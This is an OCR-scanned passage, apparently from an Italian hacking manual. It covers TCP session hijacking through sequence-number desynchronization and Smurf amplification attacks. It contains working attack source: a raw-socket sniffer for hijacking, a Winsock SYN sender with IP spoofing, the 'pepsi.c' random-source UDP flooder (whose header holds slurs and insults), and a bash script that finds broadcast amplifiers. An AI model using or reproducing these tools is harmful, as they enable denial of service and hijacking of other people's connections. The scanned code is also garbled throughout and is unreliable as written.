sigaction (SIGIO, &rc_sa, NULL) ; 

ì 



*/ 

/* we don't use signal() */ 

/* because the timing window is */ 

/* too big. . . */ 



if (fcntl (or_fd, F_SETOWN, getpid ())<0) 

perror ( "Couldn ' t set ownership") , exit (1) ; 



if (mode& IO_HANDLE ) 
{ 

if ( (fcntl_flag= fcntl (or_fd, F_GETFL, 0) ) <0) 

perror ( "Couldn ' t get FLAGS ") , exit (1 ) ; 

if (fcntl (or_fd, F_SETFL, fcntl_flag \ FASYNC \ FNDELAY) <0) 
perror ( "Couldn ' t set FLAGS ") , exit (1 ) ; 
rc_fd_abcl23=or_fd; 

} 

else 

{ 

if (mode&IO_NONBLOCK) 
{ 

if( (fcntl_flag= fcntl (or_fd, F_GETFL, 0) ) <0) 

perror ( "Couldn ' t get FLAGS ") , exit (1) ; 

if (fcntl (or_fd,F_SETFL, fcntl_f lag \ FNDELAY) <0) 
perror ( "Couldn ' t set FLAGS ") , exit (1) ; 

}; 

); 

tiifdef DEBUG 

printf ( "Reading socket ready\n") ; 

tendi f 

return or_fd; 
} 



/* returns 0 when no packet read! */ 

int get_packet (int rc_fd, char *buffer, int *TCP_ODP_start, unsigned char 

*proto) 

{ 

char help_buffer[MTU]; 
int pack_len; 

struct IP_header *gp_IPhead; 



pack_len = read (rc_fd, help_buffer, 1500) ; 
if (pack_len<0) 
( 

if (errno==EWOULDBLOCK) 
{pack_len=0; } 

else 

{perror ( "Read error: ") ; exit (1) ; } 

}; 

if (pack_len>0) 
{ 
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memcpy (buffer, help_buffer+DEV_PREFIX,pack_len) ; 
gp_IPhead = (struct IP_header *) buffer; 
if (proto .'= NULL) 

*proto = gp_IPhead->protocol ; 
if (TCP_UDP_start .'= NULL) 

*TCP_UDP_start = (gp_IPhead->verlen S OxF) « 2; 

} 

return pack_len; 
} 

void wait packet timeout (int sig) 
{ 

alarm ( 0) ; 

WAIT_PACKET_ WAIT_ TIME=1 ; 
} 

int wait_packet (int wp_fd, struct sp_wait_packet *ret_values, 

char *wp_source, unsigned short wp_source _port, 
char *wp_dest, unsigned short wp_dest _port, int wp_flags, 
int wait_time) 

{ 

char wp_buffer[1500]; 
struct IP_header *wp_iphead; 
struct TCP_header *wp_tcphead; 
unsigned long wp_sourcel, wp_destl; 
int wp_tcpstart; 
char wp _proto; 

wp_sourcel=sp_getaddrbyname (wp_source) ; 
wp_destl=sp_getaddrbyname (wp_dest) ; 

WAIT_PACKET_WAIT_TIME=0 ; 
if (wait_time !=0) 
l 

signal (SIGALRM, wait_packet_timeout ) ; 

alarm (wait_time) ; 

} 

while(l) 

{ 

while (get _packet (wp_fd, wp_buffer, &wp_tcpstart , &wp_proto) <=0) 
{ 

if (WAIT_PACKET_WAIT_TIME!=0) { alarm (0) ; return -1; } 

ì; 

if (wp_proto == 6) 
{ 

wp_iphead= (struct IP_header *) wp_buffer; 

wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart) ; 

if ( (wp_sourcel==wp_iphead->source) && (wp_destl==wp_iphead->destination) 

) 

{ 

if( (ntohs (wp_tcphead->source) ==wp_source _port) SS 

(ntohs (wp_tcphead- 

>destination) ==wp_dest_port) ) 
{ 

if( (wp_flags==0) Il (ntohs (wp_tcphead->offset_f lag) Swp_flags) ) 
{ 

ret_values->seq=ntohl (wp_tcphead->seq_nr) ; 
ret_values->ack=ntohl (wp_tcphead->ACK_nr) ; 
ret_values->flags=ntohs (wp_tcphead->offset_flag) S 

(URGIACK/PSHIFINIRSTISYN) ; 
ret_values->datalen = ntohs (wp_iphead->length) - 

( (wp_iphead->verlen S OxF) « 2) - 
( (ntohs (wp_tcphead->offset_flag) S OxFOOO) » 

10); 

alarm (0) ; 
return 0; 

} 
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; 

; 

; 

; 

/*±mposs±ble to get here. . but anyways*/ 

alanti (0) ; return -1; 

} 



void close_receiving (vold) 
{ 

dose (rc_fd_abcl23) ; 
} 

void rc_s±gio (int sig) /* Packet handling routine */ 

{ 

char rc_buffer[1500] ; 

char packet_id [50] ; 

unsigned char *rc_so, *rc_dest; 

struct IP_header *rc_IPhead; 

struct TCP_header *rc_TCPhead; 

int pack_len; 

if (RC_FILTSET==0) return; 

if (SP_DATA_BUSY ! =0) /* skip this packet */ 

return; 

pack_len = read (rc_fd_abcl23, rc_buffer, 1500) ; 

rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX) ; 

if(rc_IPhead->protocol!=6) return; /* if not TCP */ 

rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ( (rc_IPhead- 
>verlen & OxF) « 2) ) ; 

rc_so = (unsigned char *) & (rc_IPhead->source) ; 

rc_dest = (unsigned char *) & (rc_IPhead->destination) ; 

sprint f (packet_id, "%u. %u.%u. %u.%u-%u. %u.%u.%u. %u", 

rc_so [0] , rc_so [1 ] , rc_so [2] , rc_so [3] , ntohs (rc_TCPhead->source) , 
rc_dest [0] , rc_dest [1 ] , rc_dest [2] , rc_dest [3] , ntohs (rc_TCPhead- 

>destination) ) ; 

if (strcmp (packet_id, rc_filter_string) ==0) 
{ 

SP_DATA_BUSY=1 ; 

CUR_SEQ = ntohl (rc_TCPhead->seq_nr) ; 
CUR_ACK = ntohl (rc_TCPhead->ACK_nr) ; 

CUR_FLAGS = ntohs (rc_TCPhead->offset_f lag) ; 
CUR_DATALEN = ntohs (rc_IPhead->length) - 

( (rc_IPhead->verlen & OxF) « 2) - 

( (ntohs (rc_TCPhead->offset_f lag) & OxFOOO) » 10); 

CUR_COUNT++; 
SP_DATA_BUSY=0 ; 
} 

) 

void set_filter (char *f_source, unsigned short f_source_port , 
char *f_dest, unsigned short f_dest_port) 

{ 

unsigned char *f_so, *f_des; 
unsigned long f_sol, f_destl; 

RC_FILTSET=0 ; 

if (DEV_PREFIX==9999) 

fprintf (stderr, "DEV_PREFIX not set!\n"), exit (1) ; 
f_sol = sp_getaddrbyname (f_source) ; 
f_destl = sp_getaddrbyname (f_dest) ; 
f_so = (unsigned char *) &f_sol; 
f_des = (unsigned char *) &f_destl; 
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sprint f (rc_f lite r_st ring, "%u. %u.%u.%u. %u-%u. %u. %u. %u. %u", 

f_so[0] , f_so[l ] , f_so[2] , f_so[3] , f_source_port , 

f_des [0] , f_des [1 ] , f_des [2] , f_des [3 ] , f_dest_port ) ; 

RC_FILTSET=1 ; 



Stato di Desincronizzazione 

La seguente spiegazione è orientata a spiegare quello che è il concetto di 
desincronizzazione. 

Per semplicità da adesso in poi indicheremo con: 

SVR_SEQ il Sequence number del prossimo byte che il server spedirà 
SVR_ACK il prossimo byte che il server si aspetta di ricevere 
SRV_WND la grandezza della finestra di ricezione del server 
CLT_SEQ il Sequence number del prossimo byte che il client spedirà 
CLT_ACK il prossimo byte che il client si aspetta di ricevere 



In una situazione di "calma" durante una connessione, cioè un momento in cui non vengono 
spediti dati da entrambe le parti, le seguenti equazioni sono vere: 



SVR_SEQ = CLT_ACK e CLT_SEQ = SRV_ACK 



Invece mentre sono trasferiti dei dati sono vere queste altre espressioni: 

CLT_ACK <= SVR_SEQ <= CLT_ACK + CLT_WND 
SRV_ACK <= CLT_SEQ <= SRV_ACK + SRV_WND 

da cui si può capire che un pacchetto è accettabile se il suo Sequence number appartiene 
all'intervallo [SRV_ACK, SRV_ACK + SRV_WIN] per il server e [CLTACK, CLTACK + 
CLT_WIN] per il client. 

Se il Sequence number supera o precede questo intervallo il pacchetto viene scartato e viene 
spedito un pacchetto contenente nell'Acknowledgement number il Sequence number del 
prossimo byte atteso. 

Il termine desincronizzazione si riferisce ad una situazione in cui durante una connessione in 
un periodo di "calma" sono vere le seguenti equazioni SVR_SEQ != CLT_ACK e CLT_SEQ != 
SRV_ACK (dove != sta a significare diverso). 

Se una connessione si trovasse in una situazione di questo tipo e dei dati venissero spediti 
da una delle parti potrebbero presentarsi due casi distinti: 

- Se CLTSEQ < SVR_ACK + SVR_WND e CLTSEQ > SVR_ACK il pacchetto è accettabile 
e i dati vengono memorizzati per un uso futuro, ma non vengono processati. 

- Se CLT SEQ > SVR_ACK + SVR_WND o CLT SEQ < SVR_ACK il pacchetto non è 
accettabile e viene scartato. 

In pratica se una connessione è in questo stato i due host non possono scambiarsi dati. 



Altra descrizione di attacco 

La seguente descrizione proviene da un testo che gira sulla rete, uno dei tantissimi che sono 
reperibili legati a questo argomento. 

La situazione di attacco può essere rappresentata graficamente nel seguente modo: 



A 




A e 


C = Host 


della stessa sottorete 




1 


B 


= Host 


di una rete diversa da A e C 


C 


+ 


H 


= HUB 
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Supponiamo che esista una connessione telnet da A verso B e che l'attaccante si trovi nella 
postazione C. 

Cosa succederebbe se quest'ultimo in un periodo di "calma" della connessione tra A e B 

mandasse un pacchetto spoofato a B in modo da far credere che provenga da A? 

Semplice, B aggiornerebbe l'Acknowledgement number di A (SVR_ACK) in base al pacchetto 

ricevuto desincronizzandosi dal Sequence number reale di A (CLT_SEQ). 

A questo punto i pacchetti spediti da A verranno scartati in quanto per B hanno un Sequence 

number errato. Vediamo un esempio per capire meglio: 



B si aggiorna Sequence number e Acknowledgement number: 
Sequence number = 500 



SEQ=500 ACK=110 DATI=15 B spedisce un pacchetto contenente 15 Byte di Dati 
A < B Sequence number=500 e Acknowledgement number=110 

Il pacchetto arriva ad A che si riaggiorna Acknowledgement number e Sequence number: 

Sequence number =110 
Acknowledgement = 500 + 15 

A questo punto si intromette l'attaccante con un pacchetto Spoofato, usando il Sequence 
number e l'Acknowledgement number corretti. 

SEQ=110 ACK=515 DATI=20 C spedisce un pacchetto spoofato contenente 
A(C) > B 20 Byte di Dati Sequence number=110 e 



B si aggiorna Sequence number e Acknowledgement number: 




A questo punto B è desincronizzato rispetto ad A in quanto il prossimo byte 

che B si aspetta da A è il 1 30, mentre il Sequence number di A è a 1 1 0. 

Quindi i pacchetti che A spedirà a B da questo momento in poi verranno scartati. 

L'attaccante però sa cosa si aspetta B e perciò può mandare dei pacchetti creati 

appositamente per essere accettati. 

Ricordiamo che nel nostro esempio la connessione in corso era una sessione telnet, quindi 

adesso l'attaccante può mandare comandi di shell a B come se fosse A. 

C'è da notare che nell'esempio appena descritto non c'è una desincronizzazione da entrambe 

le parti, infatti abbiamo che CLT SEQ != SRV_ACK ma SVR_SEQ = CLT ACK. 

Quindi l'host A accetterà tutti i pacchetti spediti da B come risposta ai comandi 

dell'attaccante, e quindi vedrà tutto quello che questi sta facendo. 

Per evitare ciò l'attaccante deve creare una situazione di desincronizzazione anche nell'altro 

senso di trasmissione spedendo un pacchetto spoofato ad A come se provenisse da B. 

Ricordiamo che essendo l'attaccante nella stessa sottorete di A è in grado di vedere l'output 

dei propri comandi sniffando i pacchetti di risposta spediti da B. 

Ci sono varie tecniche per ottenere la desincronizzazione di una connessione. 

Quella vista nell'esempio è quella usata solitamente e consiste appunto nello spedire un 

pacchetto spoofato contenente dei dati sia al server che al client. 

Più è grande il numero di byte spediti in questi pacchetti e più è grande la desincronizzazione 
che si andrà a creare tra i due host. 

Esiste comunque un secondo e più raffinato metodo di desincronizzazione, che consiste 
nell'intromettersi nel protocollo three-way handshake usato per creare una connessione. Il 
funzionamento si può sintetizzare in 4 punti: 
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1 - L'attaccante aspetta di ricevere il pacchetto SYN/ACK, proveniente dal server e diretto 
verso il client (secondo passo del three-way handshake), della connessione da 
desincronizzare. 

2 - Appena lo ha identificato spedisce un pacchetto di RST (Spoofato) verso il server e 
immediatamente dopo uno di SYN (sempre Spoofato) con gli stessi parametri (porta TCP e 
indirizzo IP) usati per la connessione da desincronizzare, ma con un differente Sequence 
number. 

3 - Il server chiuderà la prima connessione grazie al pacchetto RST, e ne aprirà una uguale 
ma con un Sequence number diverso, spedendo il pacchetto SYN/ACK. 

identifica quest'ultimo, spedisce il pacchetto ACK necessarie 



A questo punto la connessione è aperta, ma è in uno stato di desincronizzazione in quanto 
per il client il Sequence number corretto è quello che era presente nel pacchetto SYN/ACK 
intercettato dall'attaccante al punto 1, mentre per il server quello corretto è quello introdotto 
dall'attaccante nel punto 2. 

L'ultimo sorgente è una dimostrazione utilizzante WINSOCK2 che mostra come inviare TCP 
SYN. 

/* 

lowlevel: WlnSock Extension example (TCP syn) 
author: dbl-dipper 

requirements : wINJECT must be runnlng, a compiler with wsock32.1±b and 
then you must own a brain . 

Descrlptlon: Shows how to send tep syn packs . 

Thls can be made Into a scanner when the "Raw_Reading" 

feature 

: is ready. 

- [Flooding "turned off" by moofz. .] — 
*/ 

^include <w±ndows.h> 
# include <winsock.h> 
^include <stdlib.h> 
^include <stdio.h> 

tidefine IP_TTL 7 

struct IP_Header 



{ 



unsigned IP_Hdrlen:4; 
unsigned IP_Vers:4; 
u_char IP_Tos; 
u_short IP_Len; 
u_short IP_Id; 
u_short IP_FragOff; 
u_char IP_Ttl; 
u_char lP_Proto; 
u_short IP_Checksum; 
struct ±n_addr IP_Source; 
struct ±n_addr IP_Dest; 



/* IP Header Length */ 

/* IP Version */ 

/* Type of Service */ 

/* Total Length */ 

/* Identification */ 

/* Fragment Offset */ 

/* Time To Live */ 

/* Protocol */ 

/* Checksum */ 

/* Source Address */ 

/* Destination Address 



}; 



struct TCP Header 



{ 



u_short 
u_short 
int 
int 



TCP_sport ; 
TCP_dport ; 
TCP_seq; 
TCP_ack; 



unsigned TCP_resvl : 4; 
unsigned TCP_hlen:4; 
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unsigned 


TCP_ 


f_fin:l; 


unsigned 


TCP_ 


f_syn:l; 


unsigned 


TCP_ 


f_reset : 1; 


unsigned 


TCP_ 


_f_push:l; 


unsigned 


TCP_ 


f_ack:l; 


unsigned 


TCP_ 


f_urg:l; 


unsigned 


TCP_ 


resv2:2; 


u_short 


TCP_ 


win; 


u_short 


TCP_ 


cksum; 


u_short 


TCP_ 


urgp; 



}; 

struct Pseudo_Header 
{ 

u_long ps_sip; 
u_long ps_dip; 
u_char ps_zero; 
u_char ps_proto; 
u_short ps_len; 

}; 

tidefine IPH_SIZE sizeof (struct IP_Header) 
idefine TCPH_SIZE sizeof (struct TCP_Header) 

tidefine PACKETSIZE IPH_SIZE + TCPH_SIZE // TOTAL LENGTH 

u_short ip_checksum (u_short* , int, u_long, int) ; 
int SendRawPack (char* , char* , int, int); 

WS ADATA ws a; 
SOCKET sd; 

int main (int argc, char **argv) 
{ 

int ttl; 

printf ( "WinSock Extension example\nAuthor : dbl-dipper\n\n" ) ; 

if (argc != 5) 
{ 

printf ("- Usage: <src_ip> <dst_ip> <src _port> <dst_port>\n") ; 
return -1; 

} 

if (WSAStartup (MAKENORD (1, 1) , &wsa) != 0) 
{ 

printf ("This needs WinSock 1.1 or better . . . \n" ) ; 
return —1; 

} 

Sd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) ; 
if (sd == INVALID_SOCKET) 
{ 

printf ( "Problem with socket () . . . \n") ; 
WSACleanup () ; 
return -1; 

} 

ttl = 0; // MUST be 0 ! ! (sounds crazy but it works) 

if (setsockopt (sd, IPPROTO_IP, IP_TTL, (const char*) itti, sizeof (ttl) ) 
== SOCKETERROR ) 
{ 

printf ( "Problem with setsockopt () . . . \n") ; 
WSACleanup () ; 
return -1; 

} 
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// for(ttl = 0; ttl < 100; ttl++) 

SendRawPack(argv[l] , argv[2] , 1024+ttl, 80); 

pr±ntf("\n"); 
closesocket (sd) ; 
WSACleanup () ; 

return 1; 

} 

int SendRawPack (char *src_±p, char *dst_ip, int sport, int dport) 
{ 

struct IP_Header *±phdr; 
struct TCP_Header *tcphdr; 
struct Pseudo_Header *pseudohdr; 
u_char *packet; 
u_char psbuf [16] ; 
struct sockaddr_ln dest; 
int res; 

// Initialize : 

memset (Sdest, 0, sizeof (dest) ) ; 
memset (Spsbuf, 0, 16); 

// MUST be 200 .200 .200 .200 to ensure that the packet gets out : 
// Note: thls Is not the IP that will get the REAL packet! 
dest.sln_addr.s_addr = ±net_addr ("200.200.200.200") ; 
dest . sln_fam±ly = AF_INET ; 

packet = (u_char *)malloc (PACKETSIZE+1) ; 
If (! packet) 
{ 

prlntf ("Problem with buffer allocatimi ... \n" ) ; 
return —1; 

} 

// from this line YOU decide what to send! 

// fili ip: 

iphdr = (struct IP_Header *) (packet) ; 

iphdr->IP_Vers = 4; // ip version 

iphdr->IP_Hdrlen = 5; // header len: 

iphdr->IP_Tos = 0; // type of service 

iphdr->IP_Len= htons (PACKETSIZE) ; // total length (max = 

548) 

iphdr->IP_Id = htons (1) ; // Identification 

iphdr->IP_FragOff = 0; // fragment offset field 

iphdr->IP_Ttl = 255; // time to live 

iphdr->IP_Proto = 6; // protocol 

iphdr->IP_Checksum = 0; // checksum 

iphdr->IP_Source . s_addr = inet_addr (src_ip) ; // source address (u can 
spoof!) 

iphdr->IP_Dest . s_addr = inet_addr (dst_ip) ; // destination address 

iphdr->IP_Checksum = ip_checksum( (u_short*) iphdr, IPH_SIZE, 0, 1) ; 

tcphdr = (struct TCP_Header *) (packet+IPH_SIZE) ; 

tcphdr->TCP_sport = htons (sport) ; 
tcphdr->TCP_dport = htons (dport) ; 
tcphdr->TCP_seq = htonl(l); 
tcphdr->TCP_ack = 0; 
tcphdr->TCP_hlen = TCPH_SIZE / 4; 
tcphdr->TCP_resvl = 0; 
tcphdr->TCP_resv2 = 0; 
tcphdr->TCP_f_urg = 0; 
tcphdr->TCP_f_ack = 0; 
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tcphdr->TCP_f_reset = 0; 
tcphdr->TCP_f_syn = 1; 
tcphdr->TCP_f_fln = 0; 
tcphdr->TCP_wln = htons (16384) ; 
tcphdr->TCP_cksum = 0; 
tcphdr->TCP_urgp = 0; 

pseudohdr = (struct Pseudo_Header *) Spsbuf ; 

pseudohdr->ps_s±p = ±net_addr (src_±p) ; 
pseudohdr->ps_d±p = ±net_addr (dst_±p) ; 
pseudohdr->ps_zero = 0; 
pseudohdr->ps_proto = ±phdr->IP_Proto; 
pseudohdr->ps_len = htons (20) ; 

tcphdr->TCP_cksum = ±p_checksum ( (u_short*) tcphdr, 20, 0, 0) ; 
tcphdr->TCP_cksum = lp_checksum ( (u_short* ) pseudohdr , 12, tcphdr- 
>TCP_cksum, 1) ; 

res = sendtofsd, (char*)packet, PACKETSIZE, 0, (struct 

sockaddr_±n* ) Sdest, slzeof (dest) ) ; 
if (res == SOCKET_ERROR) 
( 

prlntf ( "Problem with sendto () \n" ) ; 
return -1; 

} 

// prlntf (". "); 

prlntf ("Sent %d of %d\n", res, PACKETSIZE) ; 

free (packet) ; 
return 1; 

} 

u_short ip_checksum(u_short* buffer, Int size, u_long klyt, int full) 
{ 

unslgned long cksum = klyt; 

// Sum ali the words together, addlng the final byte if size is odd 
while (size > 1) 
{ 

cksum += *buffer++; 
size -= sizeof (u_short) ; 

} 

if(size) cksum += * (UCHAR* ) buffer ; 

ifffull == 0) 
return cksum; 

// Do a little shuffling 

cksum = (cksum » 16) + (cksum & Oxffff); 
cksum += (cksum » 16); 

// Return the bitwise complement of the resulting mishmash 
return (u_short) (~cksum) ; 

} 

Un altro flooder è quello che segue: 
/* 

* pepsi . c 

* Random Source Host UDP flooder 
* 

* Author: Soldier@data-t.org 
* 
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* Greets To: Havok, nlghtmar, vira, Kage, ananda, tmw, Cheesebal, efudd, 

* Capone, cph/ber, WebbeR, Shadowimg, robocod, napster, mari, eLLjAY, 
fLICK* 

* Toasty, [shadow] , [magnus] and silitek, oh and Data-T. 
* 

* Fuck You to: Razorl911 the bigest fucking lamers in the warez comunity, 

* Yakuza for ripping my code, tichaOs on the undernet for trying to port 

* it to win95, then ircOpers on efnet for being such cocksuckers 

* especially prae for trying to cali the fbi on me at least 5 times . 

* ali warez pups i don ' t know for ripping off honest programers . 

* and Dianora for being a lesbian hoe, Srfag. .err SrfRog for having an ego 

* the size of California . 

* AND A BIG HUGE ENORMOUS FUCK YOU TO myc, throwback, crush, asmodean, 
Piker, 

* pireaus, A HUGE FUCKING FUCK to texas.net, and the last HUGEST FUCK IN 

* INTERNET HISTORY, AMM. 
* 

* 

* Disclaimer since i don't wanna go to jail 

* - this is for educational purposes only 
* 

*/ 



/* [Defines] */ 



tidefine FRIEND "My christmas present to the internet -Soldier" 

tidefine VERSION "Pepsi . c vi. 6" 

tidefine DSTPORT 7 

tidefine SRCPORT 19 

tidefine PSIZE 1024 

tidefine DWAIT 1 



/* [Includes] */ 



^include <unistd.h> 
^include <stdlib.h> 
^include <string.h> 
^include <netdb.h> 
^include <stdio.h> 
^include <sys/types.h> 
^include <sys/socket . h> 
^include <netinet/in . h> 
^include <netinet/in_systm.h> 
^include <netinet/ip.h> 
^include <netinet/tcp.h> 
^include <netinet/protocols.h> 
^include <arpa/inet . h> 
^include <netdb.h> 
^include <signal . h> 
^include <netinet/ip_udp.h> 
^include <string. h> 
^include <pwd.h> 



/* [Banner] */ 

void banner ( ) 
{ 

printf ("\t\t\t%s Author - Soldier \n", VERSION); 
printf("\t\t\t [10.27.96] \n\n") ; 

printf ("This Copy Registered to: %s\n\n", FRIEND); 



/* [Option Parsing] */ 
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unsigned long dst; 

struct udphdr *udp; 
struct iphdr *±p; 

char *target; 
char *srchost; 

int dstport = 0; 
int srcport = 0; 
int numpacks = 0; 
int pslze = 0; 
int wait = 0; 

/* [Usage] */ 

void usage (char *pname) 
{ 

prlntf ("usage: \n ") ; 

printf ("%s [-s src] [-n num] [-p size] [-d port] [-o port] [-w wait] 
<dest> \n\n", pname) ; 

printf ("\t-s <src> 

printf ("\t-n <num> 

printf ("\t-p <size> 

printf ("\t-d <port> 
DSTPORT) ; 

printf ("\t-o <port> 
SRCPORT) ; 

printf ("\t-w <time> 

printf ("\t<dest> 

printf ("\n") ; 

exit (EXIT_SUCCESS) ; 

} 

/* [In chksum with some mods] */ 

unsigned short in_cksum (addr, len) 
u_short *addr; 
int len; 
{ 

register int nleft = len; 
register u_short *w = addr; 
register int sum = 0; 
u_short answer = 0; 

while (nleft > 1) { 
sum += *w++; 
sum += *w++; 
nleft -= 2; 

} 

if (nleft == 1) { 

* (u_char *) (Sanswer) = * (u_char *) w; 
sum += answer; 

} 

sum = (sum » 17) + (sum & Oxffff); 
sum += (sum » 17); 
answer = -sum; 
return (answer) ; 

} 

/* Resolve Functions */ 

unsigned long resolve (char *cp) 
{ 

struct hostent *hp; 



: source where packets are comming from\n") ; 

: number of UDP packets to send\n") ; 

: Packet Size [Default is 1024] \n"); 

: Destination Port [Default is %.2d]\n", 

: Source Port [Default is %.2d]\n", 

: Wait time between packets [De fault is l]\n"); 
: destination \n ") ; 
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hp = gethostbyname (cp) ; 
if (!hp) { 

printf (" [*] Unable to resolve %s\t\n", cp) ; 
exit (EXIT_FAILURE) ; 

} 

return ( (unsigned long) hp->h_addr) ; 



void resolvedest (void) 
{ 

struct hostent *host; 

memset (Sdstaddr, 0, sizeof (struct sockaddr_in) ) ; 
dstaddr. sin_family = AF_INET; 
dstaddr . s±n_addr . s_addr = ±net_addr (target) ; 
if (dstaddr . sin_addr . s_addr == -1) { 
host = gethostbyname (target) ; 
if (host == NULL) { 

printf (" [*] Unable To resolve %s\t\n", target); 
exit (EXIT_FAILURE) ; 

} 

dstaddr . sin_ fami ly = host->h_addrtype; 

memcpy ( (caddr_t) & dstaddr . sin_addr, host->h_addr, host->h_length) ; 

} 

memcpy (&dst, (char *) Sdstaddr . sin_addr . s_addr, 4); 



/* Parsing Argz */ 

void par se_args (int argc, char *argv[]) 
{ 

int opt; 

while ((opt = getopt(argc, argv, "s : d: n :p :w: o : ")) != -1) 
switch (opt) { 
case ' s ' : 

srchost = (char *) malloc (strlen (optarg) + 1) ; 

strcpy (srchost, optarg); 

break; 
case 'd': 

dstport = atoi (optarg) ; 

break; 
case 'n ' : 

numpacks = atoi (optarg) ; 

break; 
case 'p ' : 

psize = atoi (optarg) ; 

break; 
case ' w ' : 

wait = atoi (optarg) ; 

break; 
case ' o ' : 

srcport = atoi (optarg) ; 

break; 
default : 

usage (argv[0] ) ; 

} 

if (! dstport) 

dstport = DSTPORT; 
if ( ! srcport) 

srcport = SRCPORT; 
if (! psize) 

psize = PSIZE; 
if (ìwait) 

wait = DWAIT; 
if ( !argv[optind] ) { 
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exit (EXIT_FAILURE) ; 

} 

target = (char *) malloc (strlen (argv [optlnd] ) ) ; 
if (! target) { 

pvts (" [*] Agh! Out of memory!"); 
perror ( "malloc ") ; 

exit (EXIT_FAILURE) ; 

} 

strcpy (target, argv [optlnd] ) ; 

} 

/* [Send Packet] */ 

vold maln (Int argo, char *argv[]) 
{ 

Int sen, 1, unllm = 0, sec_check; 
char *packet; 

banner () ; 

if (argc < 2) 

usage (argv[0] ) ; 



parse_args (argc, argv); 



resolvedest () ; 



prlntf("§ Target Host 
prlntf ("§ Source Host 

(srchost && *srchost) 
if (Inumpacks) 

prlntf ("# Number 
else 

prlntf ("§ Number 
prlntf ("it Packet Size 
prlntf ("# Walt Time 
prlntf ("# Dest Port 
printf ("# Source Port 



: %s\n", 
: %s\n", 
srchost : 



target) ; 
"Random ") ; 
Unliminted\n ") ; 



: %d\n", numpacks) ; 
%d\n", psize) ; 
%d\n", wait) ; 
%d\n", dstport) ; 
%d\n", srcport ) ; 



sen = socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ; 
packet = (char *) malloc (sizeof (struct iphdr) + 

sizeof (struct udphdr) + 

psize) ; 

ip = (struct iphdr *) packet; 

udp = (struct udphdr *) (packet + sizeof (struct iphdr)); 

memset (packet , 0, sizeof (struct iphdr) + sizeof (struct udphdr) + psize); 

if (Inumpacks) { 
unlim++; 
numpacks++ ; 

} 

if (srchost && *srchost) 

ip->saddr = resolve (srchost) ; 
ip->daddr = dst; 
ip->version = 4; 
ip->ihl = 5; 
ip->ttl = 255; 
ip->protocol = IPPROTO_UDP; 

ip->tot_len = htons (sizeof (struct iphdr) + sizeof (struct udphdr) + 
psize) ; 

ip->check = in_cksum(ip, sizeof (struct iphdr)); 
udp->source = htons (srcport) ; 
udp->dest = htons (dstport) ; 

udp->len = htons (sizeof (struct udphdr) + psize); 



for (1 = 0; 1 < numpacks; (unllm) ? i++, 1 — ; 1++) { 
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±p->saddr = rand() ; 

if (sentito (sen, packet, sizeof (struct iphdr) + 
sizeof (struct udphdr) + psize, 
0, (struct sockaddr *) &dstaddr, 
slzeof (struct sockaddr_ln) ) == (-1) ) { 

puts ( " [*] Error sendlng Packet"); 

perror ( "SendPacket ") ; 

exit (EXIT_FAILURE) ; 

} 

usleep (wait) ; 

} 

} 



S murf 

Una delle metodologie legate all'attività hacker di fatto è legata a quelle chiamate con il 
termine di DOS ovvero Denial of Service. 

Lo scopo di questi tipi di attacchi è quello di consumare le risorse dei sistemi remoti in modo 
tale che questi smettano di funzionare o comunque degradino le loro prestazioni. 
Lo scopo di questa tecnica ? 

Chiaramente quella legata al fatto in se stesso finalizzato soltanto al fatto di soddisfare quella 
parte dell'animale uomo che procura piacere nell'istante in cui si danneggia il prossimo. 
Un altro scopo un po' più elevato come finalità è quello di riuscire a bloccare le trasmissioni di 
un determinato host al fine di cercare di sostituirsi a questo in un sistema di hosts considerati 
come trusted. 

Una domanda che verrà spontanea è quella legata al fatto di non riuscire a comprendere 
come un sistema di un hacker, con una linea magari a 28 KB, possa di fatto riuscire a fare 
esaurire le risorse, ad esempio quelle di banda, di un qualche server che è connesso a 
internet tramite linee come ad esempio le T1 . 

Nel capitolo legato alla descrizione dei protocolli avevamo parlato di un tipo di indirizzo 
particolare e precisamente quello relativo al broadcasting. 

Un server che riceve un pacchetto legato al protocollo ICMP di PING (ICMP servizio ECHO 
REQUEST) indirizzato ad un indirizzo di broadcast invia a sua volta lo stesso a tutti gli host a 
lui connessi per cui chiaramente il traffico generato viene amplificato a tal punto che un 
sistema con un modem come quello appena detto a 28 K potrebbe al limite costringere un 
sistema a occupare 2/3 di una linea T1 . 

Pur essendo uno degli attacchi più recenti i sistemisti esperti hanno subito imparato a 
proteggersi inserendo all'interno dei routers speciali filtri atti a non permettere il passaggio di 
certi tipi di pacchetti. 

In ogni caso esistono certi siti che pubblicano gli scan fatti specificando gli IP soggetti agli 
attacchi SMURF e il numero di sistemi a cui questi cercano di inoltrare i pacchetti quando 
ricevono i fatidici pacchetti di PING. 

Dal punto di vista del sistemista dobbiamo dire che il tracing di questo genere di attacco è 
abbastanza complesso. 

Volendolo schematizzare graficamente lo potremmo rappresentare nel seguente modo : 



A = 


Host Attaccante 






V = 


Host Vittima 






S = 


Sottorete contenente 100 Host 


B = 


Indirizzo di broadcast 


della 


sottorete S 


V(A) 


ECHO REQUEST 


—> B 


A Spedisce un pacchetto ICMP "ECHO REQUEST" 








Spoofato con 1 'indirizzo di V ali 'indirizzo 








di broadcast della sottorete. 






— > 


Tutti i 100 host della sottorete rispondono 




200 Pacchetti 


— > 


con un pacchetto ICMP "ECHO REPLY" a V 


S 


ICWP 


— > V 


credendo che sia lui ad aver spedito il 




ECHO REPLY 


— > 


pacchetto precedente. 
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La ricerca degli IP con possibilità di broadcast che replichino con più di 30 sistemi può 
essere eseguita con il seguente programmino di shell per Unix. 



bips . sh 

#!/bin/bash 

# find broadcast ip's that reply with 30+ dupes. 

# i decided to make this script into tino sections . when running this make 

# sure both parts are in the same directory . 

if [ $# != 1 ]; then 

echo "$0 <domain - ie: college . edu>" 
else 

host -1 $1 I grep 'has address ' / cut -d ' ' -f 4 > $1 . ips 
cat $l.ips I cut -d' . ' -fl-3 / sort l\ 
awk ' { print echo " "$1 " . 255 " } ' > $1 . tmp 

cat $l.tmp I uniq / awk '{ print " . / chekdup . sh "$1"" }' > $l.ping 

rm —f $1 . ips $1 . tmp 

chmod 700 $l.ping 

./$l.ping 

rm $l.ping 

fi 



Il seguente sorgente invece controlla se su un determinati IP è possibile inviare messaggi di 
broadcast che generino in certo numero di messaggi ICMP di replica. 



chekdup . sh 




§!/bin/bash 




# this checks possible broadcast ip's for a given amount of icm\ 


3 echo 


